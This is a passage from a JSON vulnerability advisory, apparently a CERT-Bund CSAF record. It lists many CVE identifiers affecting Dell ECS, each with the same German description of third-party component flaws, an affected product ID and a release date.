"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2253"
},
{
"cve": "CVE-2023-22809",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-22809"
},
{
"cve": "CVE-2023-23454",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-23454"
},
{
"cve": "CVE-2023-23455",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-23455"
},
{
"cve": "CVE-2023-23559",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-23559"
},
{
"cve": "CVE-2023-23916",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-23916"
},
{
"cve": "CVE-2023-23946",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-23946"
},
{
"cve": "CVE-2023-24329",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-24329"
},
{
"cve": "CVE-2023-24532",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-24532"
},
{
"cve": "CVE-2023-24534",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-24534"
},
{
"cve": "CVE-2023-2483",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2483"
},
{
"cve": "CVE-2023-24998",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-24998"
},
{
"cve": "CVE-2023-2513",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2513"
},
{
"cve": "CVE-2023-25193",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-25193"
},
{
"cve": "CVE-2023-25652",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-25652"
},
{
"cve": "CVE-2023-25690",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-25690"
},
{
"cve": "CVE-2023-25809",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-25809"
},
{
"cve": "CVE-2023-25815",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-25815"
},
{
"cve": "CVE-2023-26048",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-26048"
},
{
"cve": "CVE-2023-26049",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-26049"
},
{
"cve": "CVE-2023-2650",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2650"
},
{
"cve": "CVE-2023-26545",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-26545"
},
{
"cve": "CVE-2023-26604",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-26604"
},
{
"cve": "CVE-2023-27533",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-27533"
},
{
"cve": "CVE-2023-27534",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-27534"
},
{
"cve": "CVE-2023-27535",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-27535"
},
{
"cve": "CVE-2023-27536",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-27536"
},
{
"cve": "CVE-2023-27538",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-27538"
},
{
"cve": "CVE-2023-27561",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-27561"
},
{
"cve": "CVE-2023-2828",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2828"
},
{
"cve": "CVE-2023-28320",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28320"
},
{
"cve": "CVE-2023-28321",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28321"
},
{
"cve": "CVE-2023-28322",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28322"
},
{
"cve": "CVE-2023-28328",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28328"
},
{
"cve": "CVE-2023-28464",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28464"
},
{
"cve": "CVE-2023-28486",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28486"
},
{
"cve": "CVE-2023-28487",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28487"
},
{
"cve": "CVE-2023-28642",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28642"
},
{
"cve": "CVE-2023-28772",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28772"
},
{
"cve": "CVE-2023-28840",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28840"
},
{
"cve": "CVE-2023-28841",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28841"
},
{
"cve": "CVE-2023-28842",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-28842"
},
{
"cve": "CVE-2023-29007",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-29007"
},
{
"cve": "CVE-2023-29383",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-29383"
},
{
"cve": "CVE-2023-29402",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-29402"
},
{
"cve": "CVE-2023-29406",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-29406"
},
{
"cve": "CVE-2023-29409",
"notes": [
{
"category": "description",
